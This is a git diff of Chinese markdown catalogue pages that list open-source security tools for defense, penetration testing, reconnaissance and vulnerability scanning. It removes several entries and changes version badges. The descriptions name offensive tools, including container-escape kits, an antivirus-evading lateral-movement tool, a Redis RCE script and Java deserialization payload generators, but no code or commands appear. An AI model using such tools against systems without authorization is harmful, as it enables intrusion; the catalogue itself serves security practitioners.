-![GitHub stars](https://img.shields.io/github/stars/murphysecurity/murphysec.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.10.0-red)
-
-<https://github.com/murphysecurity/murphysec>
-
-墨菲安全专注于软件供应链安全，murphysec 是墨菲安全的 CLI 工具，用于在命令行检测指定目录代码的依赖安全问题，也可以基于 CLI 工具实现在 CI 流程的检测。
-
-### [GShark](detail/gshark.md)
+### [gshark](detail/gshark.md)
 ![Author](https://img.shields.io/badge/Author-madneal-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![GitHub stars](https://img.shields.io/github/stars/madneal/gshark.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.2.0-red)
+![Version](https://img.shields.io/badge/Version-V0.8.4-red)
 
 <https://github.com/madneal/gshark>
 
-一款开源敏感信息检测系统，可以监测包括 GitHub, GitLab(支持私有部署版本), Postman, searchcode 多个平台的敏感信息监测。
+一款开源敏感信息监测系统，可以监测包括 github、gitlab(目前不太稳定，由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。
 
 ### [Juggler](detail/Juggler.md)
 ![Author](https://img.shields.io/badge/Author-C4o-orange)
@@ -114,13 +58,3 @@ OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复
 
 一个也许能骗到黑客的系统，可以作为WAF等防护体系的一环。
 
-### [Hades](detail/Hades.md)
-![Author](https://img.shields.io/badge/Author-theSecHunter-orange)
-![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue)
-![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.0-red)
-
-<https://github.com/theSecHunter/Hades>
-
-Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统，其中每个插件均可独立分开运行。
-
diff --git a/penetration_test.md b/penetration_test.md
index 15a61cf93..e58b4a2d2 100644
--- a/penetration_test.md
+++ b/penetration_test.md
@@ -1,144 +1,43 @@
 ## 攻击与利用 / penetration_test
 
-1. [dperf](#dperf)
-2. [pocsuite3](#pocsuite3)
-3. [Viper](#viper)
-4. [CDK](#cdk)
-5. [MDUT](#mdut)
-6. [WMIHACKER](#wmihacker)
-7. [BurpCrypto](#burpcrypto)
-8. [MySQL-Fake-Server](#mysql-fake-server)
-9. [ysomap](#ysomap)
-10. [Cloud-Bucket-Leak-Detection-Tools](#cloud-bucket-leak-detection-tools)
-11. [DNSlog-GO](#dnslog-go)
-12. [Antenna](#antenna)
-13. [Redis-Rogue-Server](#redis-rogue-server)
-14. [Cola-Dnslog](#cola-dnslog)
-15. [MysqlT](#mysqlt)
-16. [JYso](#jyso)
+1. [CDK](#cdk)
+2. [Viper](#viper)
+3. [MDUT](#mdut)
+4. [Redis-Rogue-Server](#redis-rogue-server)
+5. [MysqlT](#mysqlt)
 
 ----------------------------------------
 
-### [dperf](detail/dperf.md)
-![Author](https://img.shields.io/badge/Author-Benjamin-orange)
-![Language](https://img.shields.io/badge/Language-C-blue)
-![GitHub stars](https://img.shields.io/github/stars/baidu/dperf.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.0-red)
-
-<https://github.com/baidu/dperf>
-
-dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试，发布性能测试报告。
-
-### [pocsuite3](detail/pocsuite3.md)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/pocsuite3.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.0.4-red)
+### [CDK](detail/CDK.md)
+![Author](https://img.shields.io/badge/Author-cdkteam-orange)
+![Language](https://img.shields.io/badge/Language-CDK-blue)
+![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V1.0.4-red)
 
-<https://github.com/knownsec/pocsuite3>
+<https://github.com/cdk-team/CDK>
 
-pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试和概念验证开发框架。它带有强大的概念验证引擎，以及针对最终渗透测试人员和安全研究人员的许多强大功能。
+CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式，插件化管理。
 
 ### [Viper](detail/Viper.md)
 ![Author](https://img.shields.io/badge/Author-FunnyWolf-orange)
 ![Language](https://img.shields.io/badge/Language-JS/Python-blue)
 ![GitHub stars](https://img.shields.io/github/stars/FunnyWolf/Viper.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V20230827-red)
+![Version](https://img.shields.io/badge/Version-V1.5.5-red)
 
 <https://github.com/FunnyWolf/Viper>
 
 VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。
 
-### [CDK](detail/CDK.md)
-![Author](https://img.shields.io/badge/Author-cdkteam-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.2-red)
-
-<https://github.com/cdk-team/CDK>
-
-CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式，插件化管理。
-
 ### [MDUT](detail/MDUT.md)
 ![Author](https://img.shields.io/badge/Author-Ch1ngg-orange)
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![GitHub stars](https://img.shields.io/github/stars/SafeGroceryStore/MDUT.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.1-red)
+![Version](https://img.shields.io/badge/Version-V2.0.7-red)
 
 <https://github.com/SafeGroceryStore/MDUT>
 
 MDUT 全称 Multiple Database Utilization Tools，旨在将常见的数据库利用手段集合在一个程序中，打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂；MDUT 使用 Java 开发，支持跨平台使用。
 
-### [WMIHACKER](detail/WMIHACKER.md)
-![Author](https://img.shields.io/badge/Author-rootclay-orange)
-![Language](https://img.shields.io/badge/Language-VBScript-blue)
-![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/rootclay/WMIHACKER>
-
-WMIHACKER是一款免杀横向渗透远程命令执行工具，常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令，这些方式都已经被杀软100%拦截，通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动，效率高且不易被检测。
-
-### [BurpCrypto](detail/BurpCrypto.md)
-![Author](https://img.shields.io/badge/Author-whwlsfb-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/whwlsfb/BurpCrypto.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/whwlsfb/BurpCrypto>
-
-支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。
-
-### [MySQL-Fake-Server](detail/MySQL-Fake-Server.md)
-![Author](https://img.shields.io/badge/Author-fnmsd-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/fnmsd/MySQL_Fake_Server.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/fnmsd/MySQL_Fake_Server>
-
-用于渗透测试过程中的假MySQL服务器，纯原生python3实现，不依赖其它包。
-
-### [ysomap](detail/ysomap.md)
-![Author](https://img.shields.io/badge/Author-wh1t3p1g-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/wh1t3p1g/ysomap.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1.3-red)
-
-<https://github.com/wh1t3p1g/ysomap>
-
-Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架，可动态配置具备不同执行效果的Java反序列化利用链payload，以应对不同场景下的反序列化利用。
-
-### [Cloud-Bucket-Leak-Detection-Tools](detail/Cloud-Bucket-Leak-Detection-Tools.md)
-![Author](https://img.shields.io/badge/Author-UzJu-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.4.0-red)
-
-<https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
-
-Cloud-Bucket-Leak-Detection-Tools是一款针对云厂商存储桶扫描检测与利用的工具
-
-### [DNSlog-GO](detail/DNSlog-GO.md)
-![Author](https://img.shields.io/badge/Author-lanyi-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.2-red)
-
-<https://github.com/lanyi1998/DNSlog-GO>
-
-DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具，自带WEB界面。单文件运行，无依赖。部署方便快捷。
-
-### [Antenna](detail/Antenna.md)
-![Author](https://img.shields.io/badge/Author-wuba-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/wuba/Antenna.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.3.5-red)
-
-<https://github.com/wuba/Antenna>
-
-Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验证网络中多种漏洞是否存在以及可利用性的工具。其基于带外应用安全测试( OAST)通过任务的形式，将不同漏洞场景检测能力通过插件的形式进行集合，通过与目标进行Out-of-bind的数据通信方式进行辅助检测。
-
 ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md)
 ![Author](https://img.shields.io/badge/Author-Dliv3-orange)
 ![Language](https://img.shields.io/badge/Language-Python-blue)
@@ -149,16 +48,6 @@ Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验
 
 Redis 4.x/Redis 5.x RCE利用脚本. 项目最初来源于 <https://github.com/n0b0dyCN/redis-rogue-server>
 
-### [Cola-Dnslog](detail/Cola-Dnslog.md)
-![Author](https://img.shields.io/badge/Author-AbelChe-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/AbelChe/cola_dnslog>
-
-Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台)，支持dns http ldap rmi等协议，提供API调用方式便于与其他工具结合，支持钉钉机器人、Bark等提醒，并支持docker一键部署。
-
 ### [MysqlT](detail/MysqlT.md)
 ![Author](https://img.shields.io/badge/Author-BeichenDream-orange)
 ![Language](https://img.shields.io/badge/Language-C%23-blue)
@@ -169,13 +58,3 @@ Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平
 
 伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击。
 
-### [JYso](detail/JYso.md)
-![Author](https://img.shields.io/badge/Author-qi4L-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/qi4L/JYso.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V3.4.0-red)
-
-<https://github.com/qi4L/JYso>
-
-JYso是一个可以用于 jndi 注入攻击和生成反序列化数据流的工具，既可以当 JNDIExploit 用也可以当作 ysoserial 使用。
-
diff --git a/reconnaissance.md b/reconnaissance.md
index c95f237a5..c9a7229f1 100644
--- a/reconnaissance.md
+++ b/reconnaissance.md
@@ -1,16 +1,10 @@
 ## 信息收集 / reconnaissance
 
 1. [AppInfoScanner](#appinfoscanner)
-2. [ENScanGo](#enscango)
-3. [HaE](#hae)
-4. [Kunyu](#kunyu)
-5. [Glass](#glass)
-6. [ksubdomain](#ksubdomain)
-7. [scaninfo](#scaninfo)
-8. [ZoomEye-Python](#zoomeye-python)
-9. [ct](#ct)
-10. [Zoomeye-Tools](#zoomeye-tools)
-11. [ZoomEye-go](#zoomeye-go)
+2. [HaE](#hae)
+3. [DarkEye](#darkeye)
+4. [Glass](#glass)
+5. [ZoomEye-go](#zoomeye-go)
 
 ----------------------------------------
 
@@ -18,41 +12,31 @@
 ![Author](https://img.shields.io/badge/Author-kelvinBen-orange)
 ![Language](https://img.shields.io/badge/Language-Python-blue)
 ![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.9-red)
+![Version](https://img.shields.io/badge/Version-V1.0.8-red)
 
 <https://github.com/kelvinBen/AppInfoScanner>
 
 一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具，可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如：Title、Domain、CDN、指纹信息、状态信息等。
 
-### [ENScanGo](detail/ENScanGo.md)
-![Author](https://img.shields.io/badge/Author-wgpsec-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/wgpsec/ENScan_GO.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.15-red)
-
-<https://github.com/wgpsec/ENScan_GO>
-
-一款基于各大企业信息API的工具，解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。
-
 ### [HaE](detail/HaE.md)
 ![Author](https://img.shields.io/badge/Author-gh0stkey-orange)
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![GitHub stars](https://img.shields.io/github/stars/gh0stkey/HaE.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.4.6-red)
+![Version](https://img.shields.io/badge/Version-V2.1.2-red)
 
 <https://github.com/gh0stkey/HaE>
 
 HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。
 
-### [Kunyu](detail/Kunyu.md)
-![Author](https://img.shields.io/badge/Author-风起-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/Kunyu.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.7.2-red)
+### [DarkEye](detail/DarkEye.md)
+![Author](https://img.shields.io/badge/Author-zsdevX-orange)
+![Language](https://img.shields.io/badge/Language-Golang-blue)
+![GitHub stars](https://img.shields.io/github/stars/zsdevX/DarkEye.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V4.3.0-red)
 
-<https://github.com/knownsec/Kunyu>
+<https://github.com/zsdevX/DarkEye>
 
-Kunyu(坤舆)，是一款基于ZoomEye API开发的信息收集工具，旨在让企业资产收集更高效，使更多安全相关从业者了解、使用网络空间测绘技术。
+基于go完成的渗透测试信息收集利器
 
 ### [Glass](detail/Glass.md)
 ![Author](https://img.shields.io/badge/Author-s7ckTeam-orange)
@@ -64,56 +48,6 @@ Kunyu(坤舆)，是一款基于ZoomEye API开发的信息收集工具，旨在
 
 Glass是一款针对资产列表的快速指纹识别工具，通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹，也可针对IP/IP段或资产列表进行快速的指纹识别。
 
-### [ksubdomain](detail/ksubdomain.md)
-![Author](https://img.shields.io/badge/Author-w8ay-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/boy-hack/ksubdomain.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.9.5-red)
-
-<https://github.com/boy-hack/ksubdomain>
-
-ksubdomain是一款基于无状态子域名爆破工具，支持在Windows/Linux/Mac上使用，它会很快的进行DNS爆破，在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。
-
-### [scaninfo](detail/scaninfo.md)
-![Author](https://img.shields.io/badge/Author-华东360安服团队-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.0-red)
-
-<https://github.com/redtoolskobe/scaninfo>
-
-scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具，其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点，能够快速进行端口扫描和服务识别，内置指纹识别用于 web 探测，可以用报告的方式整理扫描结果。
-
-### [ZoomEye-Python](detail/ZoomEye-Python.md)
-![Author](https://img.shields.io/badge/Author-Knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/ZoomEye-python.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.2.0-red)
-
-<https://github.com/knownsec/ZoomEye-python>
-
-ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库，提供了 ZoomEye 命令行模式，同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据
-
-### [ct](detail/ct.md)
-![Author](https://img.shields.io/badge/Author-rungobier@Knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Rust-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/ct.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.9-red)
-
-<https://github.com/knownsec/ct>
-
-ct 是一款使用 rust 语言进行开发，并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具，同时在最终爆破完成后可使用脚本，将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示
-
-### [Zoomeye-Tools](detail/ZoomEye-Tools.md)
-![Author](https://img.shields.io/badge/Author-Knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-JS-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/Zoomeye-Tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.3.2-red)
-
-<https://github.com/knownsec/Zoomeye-Tools>
-
-一个配合ZoomEye使用的Chrome插件，可以查看当前网页所在ip信息或跳转查看详细信息，还可以根据关键词一键跳转至ZoomEye进行搜索
-
 ### [ZoomEye-go](detail/ZoomEye-go.md)
 ![Author](https://img.shields.io/badge/Author-gyyyy-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
diff --git a/vulnerability_assessment.md b/vulnerability_assessment.md
index 697a43441..c20ddf8e7 100644
--- a/vulnerability_assessment.md
+++ b/vulnerability_assessment.md
@@ -1,23 +1,11 @@
 ## 漏洞探测 / vulnerability_assessment
 
-1. [afrog](#afrog)
-2. [Kunpeng](#kunpeng)
-3. [Pocassist](#pocassist)
-4. [myscan](#myscan)
-5. [LSpider](#lspider)
+1. [Kunpeng](#kunpeng)
+2. [Pocassist](#pocassist)
+3. [myscan](#myscan)
 
 ----------------------------------------
 
-### [afrog](detail/afrog.md)
-![Author](https://img.shields.io/badge/Author-zan8in-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/zan8in/afrog.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.7.9-red)
-
-<https://github.com/zan8in/afrog>
-
-afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具，PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型，帮助网络安全从业者快速验证并及时修复漏洞。
-
 ### [Kunpeng](detail/Kunpeng.md)
 ![Author](https://img.shields.io/badge/Author-opensec-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
@@ -48,13 +36,3 @@ Pocassist 是一个 Golang 编写的全新开源漏洞测试框架，帮助安
 
 myscan是参考awvs的poc目录架构，pocsuite3、sqlmap等代码框架，以及搜集互联网上大量的poc，由python3开发而成的被动扫描工具。
 
-### [LSpider](detail/LSpider.md)
-![Author](https://img.shields.io/badge/Author-LoRexxar-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/LSpider.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.2-red)
-
-<https://github.com/knownsec/LSpider>
-
-LSpider 一个为被动扫描器定制的前端爬虫
-